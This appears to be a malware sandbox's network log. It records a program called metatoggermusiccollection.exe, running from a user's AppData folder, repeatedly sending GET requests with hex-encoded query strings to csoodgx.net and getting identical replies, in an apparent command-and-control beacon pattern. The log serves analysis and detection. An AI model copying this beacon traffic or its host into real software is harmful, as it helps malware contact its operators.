                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.54972145.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:52.762234926 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:53.057368994 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:52 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.54972245.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:53.388422012 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:53.693662882 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:53 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.54972345.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:54.033443928 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:54.343990088 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:09:54.451755047 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:54.752840042 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.54972445.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:55.106878996 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:55.416470051 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:55 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.54972545.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:55.746984959 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:56.042346954 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:55 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.54972645.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:56.395343065 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:56.701100111 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:56 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:09:56.811413050 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:57.108319044 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:57 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:09:57.218725920 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:57.524729013 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:57 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.54972745.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:57.862262964 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:58.170133114 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:09:58.280004025 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:58.582115889 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.54972845.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:58.919317007 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:59.228439093 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:59 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.54972945.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:09:59.565418959 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:09:59.866986990 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:09:59 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.54973045.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:00.203382969 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:00.509139061 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:00 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.54973145.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:00.843890905 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:01.151525974 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:01 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:01.265583038 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:01.564882994 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:01 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.54973245.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:01.908488035 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:02.220505953 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:02.326673985 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:02.638163090 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.54973345.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:02.989419937 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:03.301316977 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:03 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.54973445.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:03.645339966 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:03.945609093 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:03 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.54973545.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:04.284502029 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:04.595429897 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.54973645.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:04.939735889 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:05.244760990 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:05 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.54973745.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:05.594232082 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:05.892684937 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:05 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.54973845.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:06.232199907 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:06.539088011 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:06 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.54973945.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:06.876571894 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:07.185797930 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:07 GMT
